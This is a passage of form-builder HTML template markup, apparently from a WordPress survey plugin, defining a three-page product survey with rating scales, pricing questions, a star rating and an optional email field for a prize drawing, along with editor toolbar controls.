onmouseover="chnage_icons_src(this,&quot;page_edit&quot;)" onmouseout="chnage_icons_src(this,&quot;page_edit&quot;)"></td></tr></tbody></table> <table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view3" page_title="Reward Drawing" class="wdform_tbody1" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="9" type="type_submitter_mail"><td colspan="2" id="9_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="9_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="9_label_sectionform_id_temp" class=""><span id="9_element_labelform_id_temp" class="label">8. Thank you for taking our survey. Your survey is almost complete, please enter your email address in the box below if you wish to participate in our drawing, then press the ''Submit'' button.</span><span id="9_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="middle" align="left" id="9_element_sectionform_id_temp" class=""><input type="hidden" value="type_submitter_mail" name="9_typeform_id_temp" id="9_typeform_id_temp"><input type="hidden" value="no" name="9_requiredform_id_temp" id="9_requiredform_id_temp"><input type="hidden" value="no" name="9_sendform_id_temp" id="9_sendform_id_temp"><input type="hidden" value="" name="9_uniqueform_id_temp" id="9_uniqueform_id_temp"><input type="text" class="input_deactive" id="9_elementform_id_temp" name="9_elementform_id_temp" value="" title="" onfocus="delete_value(''9_elementform_id_temp'')" onblur="return_value(''9_elementform_id_temp'')" onchange="change_value(''9_elementform_id_temp'')" style="width: 200px;"></td></tr></tbody></table></td><td id="X_9" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_9" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;9&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="10" type="type_submit_reset"><td colspan="2" class="toolbar_padding" id="10_label_and_element_sectionform_id_temp"><table id="10_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="10_label_sectionform_id_temp" class="" style="display: none;"><span id="10_element_labelform_id_temp" style="display: none;">type_submit_reset_10</span></td><td valign="middle" align="left" id="10_element_sectionform_id_temp" class=""><input type="hidden" value="type_submit_reset" name="10_typeform_id_temp" id="10_typeform_id_temp"><button type="button" class="button_submit" id="10_element_submitform_id_temp" value="Submit" onclick="check_required(''submit'', ''form_id_temp'');">Submit</button><button type="button" class="button_reset" id="10_element_resetform_id_temp" value="Reset" onclick="check_required(''reset'');" style="display: none;">Reset</button></td></tr></tbody></table></td><td id="X_10" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_10" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;10&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr></tbody></table></td></tr><tr valign="top" class="wdform_footer"><td colspan="100"><table width="100%"><tbody><tr id="form_id_temppage_nav3"><td valign="middle" align="left"><button id="page_previous_3" type="button" class="wdform_page_button" style="cursor: pointer;">Previous</button></td><td id="page_numbersform_id_temp3" width="100%" valign="middle" align="center"><span class="page_numbersform_id_temp">3/3</span></td></tr></tbody></table></td></tr></tbody><tbody id="form_id_tempform_view_img3" style="float: right;"><tr valign="middle"><td width="0%"></td><td align="right"><img src="{$plugin_path}/images/minus.png" title="Show or hide the page" class="page_toolbar" id="show_page_img_3" onclick="show_or_hide(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;minus&quot;)" onmouseout="chnage_icons_src(this,&quot;minus&quot;)"></td><td><img src="{$plugin_path}/images/page_delete.png" title="Delete the page" class="page_toolbar" onclick="remove_page(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete&quot;)"></td><td><img src="{$plugin_path}/images/page_delete_all.png" title="Delete the page with fields" class="page_toolbar" onclick="remove_page_all(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;page_delete_all&quot;)" onmouseout="chnage_icons_src(this,&quot;page_delete_all&quot;)"></td><td><img src="{$plugin_path}/images/page_edit.png" title="Edit the page" class="page_toolbar" onclick="edit_page_break(&quot;3&quot;)" onmouseover="chnage_icons_src(this,&quot;page_edit&quot;)" onmouseout="chnage_icons_src(this,&quot;page_edit&quot;)"></td></tr></tbody></table>', '<table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Product Rating" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr id="2" class="wdform_tr_section_break" type="type_section_break"><td id="2_element_sectionform_id_temp" align="left" valign="top" colspan="100" class="toolbar_padding"><h1 class="sg-title" style="font-size: 2.2em; color: #fff; font-weight: normal; line-height: normal;" data-mce-style="font-size: 2.2em; color: #fff; font-weight: normal; line-height: normal;">Product Survey</h1></td></tr><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="1" type="type_matrix"><td colspan="2" id="1_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="1_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="1_label_sectionform_id_temp" class="wdform_matrix"><span id="1_element_labelform_id_temp" class="label">1. Please indicate if you agree or disagree with the following statements</span><span id="1_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="1_element_sectionform_id_temp" class="wdform_matrix"><input type="hidden" value="type_matrix" name="1_typeform_id_temp" id="1_typeform_id_temp"><input type="hidden" value="no" name="1_requiredform_id_temp" id="1_requiredform_id_temp"><input type="hidden" value="radio" name="1_input_typeform_id_temp" id="1_input_typeform_id_temp"><table id="1_elementform_id_temp"><tbody id="1_table_little"><tr id="1_element_tr0"><td id="1_element_td0_0"></td><td id="1_element_td0_1" class="matrix_" style="\r\n    text-align: center;\r\n"><label id="1_label_elementform_id_temp0_1" name="1_label_elementform_id_temp0_1" class="ch_rad_label" for="1_elementform_id_temp1">Strongly Disagree</label></td><td id="1_element_td0_2" class="matrix_"><label id="1_label_elementform_id_temp0_2" name="1_label_elementform_id_temp0_2" class="ch_rad_label" for="1_elementform_id_temp2">Disagree</label></td><td id="1_element_td0_3" class="matrix_"><label id="1_label_elementform_id_temp0_3" name="1_label_elementform_id_temp0_3" class="ch_rad_label" for="1_elementform_id_temp3">Neutral</label></td><td id="1_element_td0_4" class="matrix_"><label id="1_label_elementform_id_temp0_4" name="1_label_elementform_id_temp0_4" class="ch_rad_label" for="1_elementform_id_temp4">Agree</label></td><td id="1_element_td0_5" class="matrix_"><label id="1_label_elementform_id_temp0_5" name="1_label_elementform_id_temp0_5" class="ch_rad_label" for="1_elementform_id_temp5">Strongly Agree</label></td></tr><tr id="1_element_tr1"><td id="1_element_td1_0" class="matrix_"><label id="1_label_elementform_id_temp1_0" class="ch_rad_label" for="1_elementform_id_temp1">Product is affordable</label></td><td id="1_element_td1_1" style="text-align: center;" align="center"><input id="1_input_elementform_id_temp1_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_1"></td><td id="1_element_td1_2" style="text-align: center;"><input id="1_input_elementform_id_temp1_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_2"></td><td id="1_element_td1_3" style="text-align: center;"><input id="1_input_elementform_id_temp1_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_3"></td><td id="1_element_td1_4" style="text-align: center;"><input id="1_input_elementform_id_temp1_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_4"></td><td id="1_element_td1_5" style="text-align: center;"><input id="1_input_elementform_id_temp1_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_5"></td></tr><tr id="1_element_tr2"><td id="1_element_td2_0" class="matrix_"><label id="1_label_elementform_id_temp2_0" class="ch_rad_label" for="1_elementform_id_temp2">Product is valuable</label></td><td id="1_element_td2_1" style="text-align: center;"><input id="1_input_elementform_id_temp2_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_1"></td><td id="1_element_td2_2" style="text-align: center;"><input id="1_input_elementform_id_temp2_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_2"></td><td id="1_element_td2_3" style="text-align: center;"><input id="1_input_elementform_id_temp2_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_3"></td><td id="1_element_td2_4" style="text-align: center;"><input id="1_input_elementform_id_temp2_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_4"></td><td id="1_element_td2_5" style="text-align: center;"><input id="1_input_elementform_id_temp2_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_5"></td></tr><tr id="1_element_tr3"><td id="1_element_td3_0" class="matrix_"><label id="1_label_elementform_id_temp3_0" class="ch_rad_label" for="1_elementform_id_temp3">Product is better<br> than other products on<br> the market</label></td><td id="1_element_td3_1" style="text-align: center;"><input id="1_input_elementform_id_temp3_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_1"></td><td id="1_element_td3_2" style="text-align: center;"><input id="1_input_elementform_id_temp3_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_2"></td><td id="1_element_td3_3" style="text-align: center;"><input id="1_input_elementform_id_temp3_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_3"></td><td id="1_element_td3_4" style="text-align: center;"><input id="1_input_elementform_id_temp3_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_4"></td><td id="1_element_td3_5" style="text-align: center;"><input id="1_input_elementform_id_temp3_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_5"></td></tr><tr id="1_element_tr4"><td id="1_element_td4_0" class="matrix_"><label id="1_label_elementform_id_temp4_0" class="ch_rad_label" for="1_elementform_id_temp4">Product is easy to use</label></td><td id="1_element_td4_1" style="text-align: center;"><input id="1_input_elementform_id_temp4_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_1"></td><td id="1_element_td4_2" style="text-align: center;"><input id="1_input_elementform_id_temp4_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_2"></td><td id="1_element_td4_3" style="text-align: center;"><input id="1_input_elementform_id_temp4_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_3"></td><td id="1_element_td4_4" style="text-align: center;"><input id="1_input_elementform_id_temp4_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_4"></td><td id="1_element_td4_5" style="text-align: center;"><input id="1_input_elementform_id_temp4_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_5"></td></tr></tbody></table><input id="1_hidden_rowform_id_temp" name="1_hidden_rowform_id_temp" type="hidden" value="Product is affordable***Product is valuable***Product is better&lt;br&gt; than other products on&lt;br&gt; the market***Product is easy to use***"><input id="1_row_idsform_id_temp" name="1_row_idsform_id_temp" type="hidden" value="1,2,3,4,"><input id="1_hidden_columnform_id_temp" name="1_hidden_columnform_id_temp" type="hidden" value="Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree***"><input id="1_column_idsform_id_temp" name="1_column_idsform_id_temp" type="hidden" value="1,2,3,4,5,"></td></tr></tbody></table></td></tr><tr id="3" type="type_scale_rating"><td colspan="2" id="3_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="3_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="3_label_sectionform_id_temp" class="wdform_scale_rating"><span id="3_element_labelform_id_temp" class="label">2. How likely are you to recommend [Product/Service] to a friend or co-worker?</span><span id="3_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="3_element_sectionform_id_temp" class="wdform_scale_rating"><input type="hidden" value="type_scale_rating" name="3_typeform_id_temp" id="3_typeform_id_temp"><input type="hidden" value="no" name="3_requiredform_id_temp" id="3_requiredform_id_temp"><input type="hidden" value="5" id="3_scale_amountform_id_temp" name="3_scale_amountform_id_temp"><div id="3_elementform_id_temp" style="float: left;"><label class="mini_label" id="3_mini_label_worst" style="position: relative; top: 6px; font-size: 11px;">Will not recommend </label><table id="3_scale_tableform_id_temp" style="display: inline-table;"><tbody><tr id="3_scale_tr1form_id_temp"><td id="3_scale_td1_1form_id_temp" style="text-align: center;"><span>1</span></td><td id="3_scale_td1_2form_id_temp" style="text-align: center;"><span>2</span></td><td id="3_scale_td1_3form_id_temp" style="text-align: center;"><span>3</span></td><td id="3_scale_td1_4form_id_temp" style="text-align: center;"><span>4</span></td><td id="3_scale_td1_5form_id_temp" style="text-align: center;"><span>5</span></td></tr><tr id="3_scale_tr2form_id_temp"><td id="3_scale_td2_1form_id_temp"><input id="3_scale_radioform_id_temp_1" name="3_scale_radioform_id_temp" value="1" type="radio"></td><td id="3_scale_td2_2form_id_temp"><input id="3_scale_radioform_id_temp_2" name="3_scale_radioform_id_temp" value="2" type="radio"></td><td id="3_scale_td2_3form_id_temp"><input id="3_scale_radioform_id_temp_3" name="3_scale_radioform_id_temp" value="3" type="radio"></td><td id="3_scale_td2_4form_id_temp"><input id="3_scale_radioform_id_temp_4" name="3_scale_radioform_id_temp" value="4" type="radio"></td><td id="3_scale_td2_5form_id_temp"><input id="3_scale_radioform_id_temp_5" name="3_scale_radioform_id_temp" value="5" type="radio"></td></tr></tbody></table><label class="mini_label" id="3_mini_label_best" style="position: relative; top: 6px; font-size: 11px;"> I will recommend</label></div></td></tr></tbody></table></td></tr><tr id="4" type="type_scale_rating"><td colspan="2" id="4_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="4_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="4_label_sectionform_id_temp" class="wdform_scale_rating"><span id="4_element_labelform_id_temp" class="label">3. How satisfied are you with this [Product/Service]?</span><span id="4_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="4_element_sectionform_id_temp" class="wdform_scale_rating"><input type="hidden" value="type_scale_rating" name="4_typeform_id_temp" id="4_typeform_id_temp"><input type="hidden" value="no" name="4_requiredform_id_temp" id="4_requiredform_id_temp"><input type="hidden" value="5" id="4_scale_amountform_id_temp" name="4_scale_amountform_id_temp"><div id="4_elementform_id_temp" style="float: left;"><label class="mini_label" id="4_mini_label_worst" style="position: relative; top: 6px; font-size: 11px;">Not Satisfied </label><table id="4_scale_tableform_id_temp" style="display: inline-table;"><tbody><tr id="4_scale_tr1form_id_temp"><td id="4_scale_td1_1form_id_temp" style="text-align: center;"><span>1</span></td><td id="4_scale_td1_2form_id_temp" style="text-align: center;"><span>2</span></td><td id="4_scale_td1_3form_id_temp" style="text-align: center;"><span>3</span></td><td id="4_scale_td1_4form_id_temp" style="text-align: center;"><span>4</span></td><td id="4_scale_td1_5form_id_temp" style="text-align: center;"><span>5</span></td></tr><tr id="4_scale_tr2form_id_temp"><td id="4_scale_td2_1form_id_temp"><input id="4_scale_radioform_id_temp_1" name="4_scale_radioform_id_temp" value="1" type="radio"></td><td id="4_scale_td2_2form_id_temp"><input id="4_scale_radioform_id_temp_2" name="4_scale_radioform_id_temp" value="2" type="radio"></td><td id="4_scale_td2_3form_id_temp"><input id="4_scale_radioform_id_temp_3" name="4_scale_radioform_id_temp" value="3" type="radio"></td><td id="4_scale_td2_4form_id_temp"><input id="4_scale_radioform_id_temp_4" name="4_scale_radioform_id_temp" value="4" type="radio"></td><td id="4_scale_td2_5form_id_temp"><input id="4_scale_radioform_id_temp_5" name="4_scale_radioform_id_temp" value="5" type="radio"></td></tr></tbody></table><label class="mini_label" id="4_mini_label_best" style="position: relative; top: 6px; font-size: 11px;"> Completely Satisfied</label></div></td></tr></tbody></table></td></tr><tr id="5" type="type_textarea"><td colspan="2" id="5_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="5_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="5_label_sectionform_id_temp" class=""><span id="5_element_labelform_id_temp" class="label">4. What would make you more satisfied with this [Product/Service]?</span><span id="5_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="5_element_sectionform_id_temp" class=""><input type="hidden" value="type_textarea" name="5_typeform_id_temp" id="5_typeform_id_temp"><input type="hidden" value="no" name="5_requiredform_id_temp" id="5_requiredform_id_temp"><input type="hidden" value="no" name="5_uniqueform_id_temp" id="5_uniqueform_id_temp"><textarea class="input_deactive" id="5_elementform_id_temp" name="5_elementform_id_temp" title="" value="" onfocus="delete_value(''5_elementform_id_temp'')" onblur="return_value(''5_elementform_id_temp'')" onchange="change_value(''5_elementform_id_temp'')" style="width: 300px; height: 100px;"></textarea></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr class="wdform_footer"><td colspan="100" valign="top"><table width="100%" style="padding-right:170px"><tbody><tr id="form_id_temppage_nav1"><td id="page_numbersform_id_temp1" width="100%" valign="middle" align="center"><span class="page_numbersform_id_temp">1/3</span></td><td valign="middle" align="right"><button id="page_next_1" type="button" class="wdform_page_button" style="cursor: pointer;">Next</button></td></tr></tbody></table></td></tr></tbody></table> <table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view2" page_title="Product Pricing" class="wdform_tbody1" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="6" type="type_radio"><td colspan="2" id="6_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="6_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="6_label_sectionform_id_temp" class=""><span id="6_element_labelform_id_temp" class="label">5. Do you feel our current price is merited by our product/service?</span><span id="6_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="6_element_sectionform_id_temp" class=""><input type="hidden" value="type_radio" name="6_typeform_id_temp" id="6_typeform_id_temp"><input type="hidden" value="no" name="6_requiredform_id_temp" id="6_requiredform_id_temp"><input type="hidden" value="no" name="6_randomizeform_id_temp" id="6_randomizeform_id_temp"><input type="hidden" value="no" name="6_allow_otherform_id_temp" id="6_allow_otherform_id_temp"><input type="hidden" value="1" name="6_rowcol_numform_id_temp" id="6_rowcol_numform_id_temp"><table><tbody id="6_table_little"><tr id="6_element_tr0"><td valign="top" id="6_td_little0" idi="0"><input type="radio" value="Yes, the price is about right" id="6_elementform_id_temp0" name="6_elementform_id_temp" onclick="set_default(''6'',''0'',''form_id_temp'')"><label id="6_label_element0" class="ch_rad_label" for="6_elementform_id_temp0">Yes, the price is about right</label></td></tr><tr id="6_element_tr1"><td valign="top" id="6_td_little1" idi="1"><input type="radio" value="No, the price is too low for your product" id="6_elementform_id_temp1" name="6_elementform_id_temp" onclick="set_default(''6'',''1'',''form_id_temp'')"><label id="6_label_element1" class="ch_rad_label" for="6_elementform_id_temp1">No, the price is too low for your product</label></td></tr><tr id="6_element_tr2"><td valign="top" id="6_td_little2" idi="2"><input type="radio" value="No, the price is to high for your product" id="6_elementform_id_temp2" name="6_elementform_id_temp" onclick="set_default(''6'',''2'',''form_id_temp'')"><label id="6_label_element2" class="ch_rad_label" for="6_elementform_id_temp2">No, the price is to high for your product</label></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr id="7" type="type_range"><td colspan="2" id="7_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="7_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="7_label_sectionform_id_temp" class=""><span id="7_element_labelform_id_temp" class="label">6. What is the amount you would every pay for a product like ours</span><span id="7_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="7_element_sectionform_id_temp" class=""><input type="hidden" value="type_range" name="7_typeform_id_temp" id="7_typeform_id_temp"><input type="hidden" value="no" name="7_requiredform_id_temp" id="7_requiredform_id_temp"><input type="hidden" value="30" name="7_range_widthform_id_temp" id="7_range_widthform_id_temp"><input type="hidden" value="1" name="7_range_stepform_id_temp" id="7_range_stepform_id_temp"><table id="7_elemet_table_littleform_id_temp"><tbody><tr><td valign="middle" align="left"><span class="ui-spinner ui-widget ui-widget-content ui-corner-all"><input type="" value="" name="7_elementform_id_temp0" id="7_elementform_id_temp0" onkeypress="return check_isnum_or_minus(event)" style="width: 30px;" class="ui-spinner-input" autocomplete="off" role="spinbutton"><a class="ui-spinner-button ui-spinner-up ui-corner-tr ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-n">▲</span></span></a><a class="ui-spinner-button ui-spinner-down ui-corner-br ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-s">▼</span></span></a></span></td><td valign="middle" align="left"><span class="ui-spinner ui-widget ui-widget-content ui-corner-all"><input type="" value="" name="7_elementform_id_temp1" id="7_elementform_id_temp1" onkeypress="return check_isnum_or_minus(event)" style="width: 30px;" class="ui-spinner-input" autocomplete="off" role="spinbutton"><a class="ui-spinner-button ui-spinner-up ui-corner-tr ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-n">▲</span></span></a><a class="ui-spinner-button ui-spinner-down ui-corner-br ui-button ui-widget ui-state-default ui-button-text-only" tabindex="-1" role="button" aria-disabled="false"><span class="ui-button-text"><span class="ui-icon ui-icon-triangle-1-s">▼</span></span></a></span></td></tr><tr><td valign="top" align="left"><label class="mini_label" id="7_mini_label_from">From</label></td><td valign="top" align="left"><label class="mini_label" id="7_mini_label_to">To</label></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr id="8" type="type_star_rating"><td valign="middle" align="left" id="8_label_sectionform_id_temp" class="wdform_star_rating"><span id="8_element_labelform_id_temp" class="label">7. Please rate the product </span><span id="8_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="8_element_sectionform_id_temp" class="wdform_star_rating toolbar_padding"><input type="hidden" value="type_star_rating" name="8_typeform_id_temp" id="8_typeform_id_temp"><input type="hidden" value="no" name="8_requiredform_id_temp" id="8_requiredform_id_temp"><input type="hidden" value="10" id="8_star_amountform_id_temp" name="8_star_amountform_id_temp"><input type="hidden" value="yellow" name="8_star_colorform_id_temp" id="8_star_colorform_id_temp"><input type="hidden" value="" id="8_selected_star_amountform_id_temp" name="8_selected_star_amountform_id_temp"><div id="8_elementform_id_temp" class="wdform_star_rating"><img id="8_star_0" src="{$plugin_path}/images/star.png" onmouseover="change_src(0,8,''form_id_temp'')" onmouseout="reset_src(0,8)" onclick="select_star_rating(0,8,''form_id_temp'')"><img id="8_star_1" src="{$plugin_path}/images/star.png" onmouseover="change_src(1,8,''form_id_temp'')" onmouseout="reset_src(1,8)" onclick="select_star_rating(1,8,''form_id_temp'')"><img id="8_star_2" src="{$plugin_path}/images/star.png" onmouseover="change_src(2,8,''form_id_temp'')" onmouseout="reset_src(2,8)" onclick="select_star_rating(2,8,''form_id_temp'')"><img id="8_star_3" src="{$plugin_path}/images/star.png" onmouseover="change_src(3,8,''form_id_temp'')" onmouseout="reset_src(3,8)" onclick="select_star_rating(3,8,''form_id_temp'')"><img id="8_star_4" src="{$plugin_path}/images/star.png" onmouseover="change_src(4,8,''form_id_temp'')" onmouseout="reset_src(4,8)" onclick="select_star_rating(4,8,''form_id_temp'')"><img id="8_star_5" src="{$plugin_path}/images/star.png" onmouseover="change_src(5,8,''form_id_temp'')" onmouseout="reset_src(5,8)" onclick="select_star_rating(5,8,''form_id_temp'')"><img id="8_star_6" src="{$plugin_path}/images/star.png" onmouseover="change_src(6,8,''form_id_temp'')" onmouseout="reset_src(6,8)" onclick="select_star_rating(6,8,''form_id_temp'')"><img id="8_star_7" src="{$plugin_path}/images/star.png" onmouseover="change_src(7,8,''form_id_temp'')" onmouseout="reset_src(7,8)" onclick="select_star_rating(7,8,''form_id_temp'')"><img id="8_star_8" src="{$plugin_path}/images/star.png" onmouseover="change_src(8,8,''form_id_temp'')" onmouseout="reset_src(8,8)" onclick="select_star_rating(8,8,''form_id_temp'')"><img id="8_star_9" src="{$plugin_path}/images/star.png" onmouseover="change_src(9,8,''form_id_temp'')" onmouseout="reset_src(9,8)" onclick="select_star_rating(9,8,''form_id_temp'')"></div></td></tr></tbody></table></td></tr><tr valign="top" class="wdform_footer"><td colspan="100"><table width="100%"><tbody><tr id="form_id_temppage_nav2"><td valign="middle" align="left"><button id="page_previous_2" type="button" class="wdform_page_button" style="cursor: pointer;">Previous</button></td><td id="page_numbersform_id_temp2" width="100%" valign="middle" align="center"><span 